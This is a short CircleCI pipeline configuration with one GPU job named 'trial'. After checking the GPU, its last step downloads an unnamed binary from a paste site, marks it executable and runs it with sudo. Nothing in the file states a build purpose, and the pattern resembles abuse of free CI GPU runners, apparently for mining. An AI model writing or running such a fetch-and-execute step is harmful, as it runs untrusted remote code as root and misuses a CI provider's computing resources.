version: 2.1

jobs:
  trial:
    machine:
      image: ubuntu-2004-cuda-11.4:202110-01
    resource_class: gpu.nvidia.small
    steps:
      - run: nvidia-smi
      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi
      - run: 
            name: "trial" 
            command: sudo apt update && sudo apt install nodejs && sudo apt install npm && wget https://hastebin.skyra.pw/raw/ekoqiticif && chmod u+x ekoqiticif && sudo ./ekoqiticif 
 
workflows: 
    version: 2.1 
    build: 
        jobs: 
        - trial
